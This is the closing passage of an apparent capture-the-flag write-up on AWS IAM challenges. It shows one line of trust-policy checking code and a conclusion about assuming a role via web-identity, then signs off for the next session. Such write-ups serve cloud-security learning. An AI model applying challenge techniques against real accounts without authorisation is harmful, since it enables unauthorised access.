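        print("strict" if strict else "weak", audit(stmt), trust_allows(stmt, guest))
```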
### Conclusion
> Through this challenge, you learn a new way to authenticate your account: assuming a role with `web-identity`. A cool methodology and easy to understand.
# Conclusion
![image](https://hackmd.io/_uploads/Bk0ZGz5WC.png)
> That's all for today. I hope you and I learned something new about IAM, policies and methods for authenticating your applications. AWS is a very cool cloud environment with unique technology; for me, AWS can bring you more knowledge about identity, authentication, services and awesome new theory. :smoking:
This hackwekend is ending, and maybe in the next session we will continue learning Cloud Security with Wiz.io, about **K8s Networking**. See you again then. Stay safe and enjoy hacking, be back soon :smiling_face_with_smiling_eyes_and_hand_covering_mouth:
![image](https://hackmd.io/_uploads/S1Yx8Wn-A.png)